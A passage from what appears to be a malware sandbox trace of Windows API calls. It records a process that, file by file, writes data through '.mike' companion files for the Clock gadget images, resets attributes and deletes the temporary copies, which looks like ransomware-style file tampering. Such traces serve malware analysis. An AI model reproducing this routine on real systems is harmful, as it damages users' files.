lpFilePart=0x0) returned 0x49 [0103.581] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.581] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png", lpFilePart=0x0) returned 0x49 [0103.581] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.mike", lpFilePart=0x0) returned 0x4e [0103.581] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png", lpFilePart=0x0) returned 0x49 [0103.582] WriteFile (in: hFile=0x288, lpBuffer=0x217b2a4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x217b2a4*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.583] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0103.584] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.mike", lpFilePart=0x0) returned 0x4e [0103.584] WriteFile (in: hFile=0x288, lpBuffer=0x217fd4c*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x217fd4c*, lpNumberOfBytesWritten=0x2af074*=0x1d0, lpOverlapped=0x0) returned 1 [0103.586] WriteFile (in: hFile=0x288, lpBuffer=0x2182f7c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2182f7c*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.586] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.mike", lpFilePart=0x0) returned 0x4e [0103.586] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.mike", lpFilePart=0x0) returned 0x4e [0103.587] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png", dwFileAttributes=0x80) returned 0 [0103.588] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png", lpFilePart=0x0) returned 0x49 [0103.588] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.mike", lpFilePart=0x0) returned 0x4e [0103.588] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.mike", lpFilePart=0x0) returned 0x4e [0103.588] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\square_m.png.mike")) returned 1 [0103.591] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png", lpFilePart=0x0) returned 0x49 [0103.591] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.591] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.mike", lpFilePart=0x0) returned 0x4e [0103.591] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png", lpFilePart=0x0) returned 0x49 [0103.592] WriteFile (in: hFile=0x288, lpBuffer=0x218807c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x218807c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.593] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0103.595] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.mike", lpFilePart=0x0) returned 0x4e [0103.595] WriteFile (in: hFile=0x288, lpBuffer=0x2190964*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2190964*, lpNumberOfBytesWritten=0x2af074*=0xc30, lpOverlapped=0x0) returned 1 [0103.597] WriteFile (in: hFile=0x288, lpBuffer=0x2193b94*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2193b94*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.597] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.mike", lpFilePart=0x0) returned 0x4e [0103.597] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.mike", lpFilePart=0x0) returned 0x4e [0103.597] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png", dwFileAttributes=0x80) returned 0 [0103.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png", lpFilePart=0x0) returned 0x49 [0103.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.mike", lpFilePart=0x0) returned 0x4e [0103.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.mike", lpFilePart=0x0) returned 0x4e [0103.599] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\square_s.png.mike")) returned 1 [0103.602] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.602] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.mike", lpFilePart=0x0) returned 0x55 [0103.603] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png", lpFilePart=0x0) returned 0x50 [0103.603] WriteFile (in: hFile=0x288, lpBuffer=0x2198e40*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2198e40*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.604] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0103.607] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.mike", lpFilePart=0x0) returned 0x55 [0103.608] SetFilePointer (in: hFile=0x288, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0103.609] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.mike", lpFilePart=0x0) returned 0x55 [0103.610] WriteFile (in: hFile=0x288, lpBuffer=0x21ba1e8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21ba1e8*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.610] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.mike", lpFilePart=0x0) returned 0x55 [0103.611] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.mike", lpFilePart=0x0) returned 0x55 [0103.611] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png", dwFileAttributes=0x80) returned 0 [0103.612] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.mike", lpFilePart=0x0) returned 0x55 [0103.612] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.mike", lpFilePart=0x0) returned 0x55 [0103.612] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\square_settings.png.mike")) returned 1 [0103.615] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", lpFilePart=0x0) returned 0x4c [0103.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png", lpFilePart=0x0) returned 0x47 [0103.616] WriteFile (in: hFile=0x288, lpBuffer=0x21bf370*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21bf370*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.660] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", lpFilePart=0x0) returned 0x4c [0103.662] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", lpFilePart=0x0) returned 0x4c [0103.663] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", lpFilePart=0x0) returned 0x4c [0103.663] WriteFile (in: hFile=0x288, lpBuffer=0x21ddc68*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21ddc68*, lpNumberOfBytesWritten=0x2af074*=0x1a0, lpOverlapped=0x0) returned 1 [0103.665] WriteFile (in: hFile=0x288, lpBuffer=0x21e0e90*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21e0e90*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.665] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", lpFilePart=0x0) returned 0x4c [0103.665] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", lpFilePart=0x0) returned 0x4c [0103.666] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png", dwFileAttributes=0x80) returned 0 [0103.667] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", lpFilePart=0x0) returned 0x4c [0103.667] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike", lpFilePart=0x0) returned 0x4c [0103.667] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\system.png.mike")) returned 1 [0103.670] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.671] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.mike", lpFilePart=0x0) returned 0x50 [0103.671] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png", lpFilePart=0x0) returned 0x4b [0103.671] WriteFile (in: hFile=0x288, lpBuffer=0x21e5fc0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21e5fc0*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.674] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.mike", lpFilePart=0x0) returned 0x50 [0103.674] WriteFile (in: hFile=0x288, lpBuffer=0x21ea3bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21ea3bc*, lpNumberOfBytesWritten=0x2af074*=0x100, lpOverlapped=0x0) returned 1 [0103.675] WriteFile (in: hFile=0x288, lpBuffer=0x21ed5f4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21ed5f4*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.676] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.mike", lpFilePart=0x0) returned 0x50 [0103.676] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.mike", lpFilePart=0x0) returned 0x50 [0103.676] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png", dwFileAttributes=0x80) returned 0 [0103.677] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.mike", lpFilePart=0x0) returned 0x50 [0103.677] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.mike", lpFilePart=0x0) returned 0x50 [0103.677] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\system_dot.png.mike")) returned 1 [0103.680] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.681] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.mike", lpFilePart=0x0) returned 0x4e [0103.681] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png", lpFilePart=0x0) returned 0x49 [0103.681] WriteFile (in: hFile=0x288, lpBuffer=0x21f273c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21f273c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.683] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.mike", lpFilePart=0x0) returned 0x4e [0103.683] WriteFile (in: hFile=0x288, lpBuffer=0x21f6a98*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21f6a98*, lpNumberOfBytesWritten=0x2af074*=0xd0, lpOverlapped=0x0) returned 1 [0103.685] WriteFile (in: hFile=0x288, lpBuffer=0x21f9cc8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21f9cc8*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.685] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.mike", lpFilePart=0x0) returned 0x4e [0103.686] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.mike", lpFilePart=0x0) returned 0x4e [0103.686] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png", dwFileAttributes=0x80) returned 0 [0103.687] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.mike", lpFilePart=0x0) returned 0x4e [0103.687] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.mike", lpFilePart=0x0) returned 0x4e [0103.687] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\system_h.png.mike")) returned 1 [0103.690] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.691] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.mike", lpFilePart=0x0) returned 0x4e [0103.691] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png", lpFilePart=0x0) returned 0x49 [0103.691] WriteFile (in: hFile=0x288, 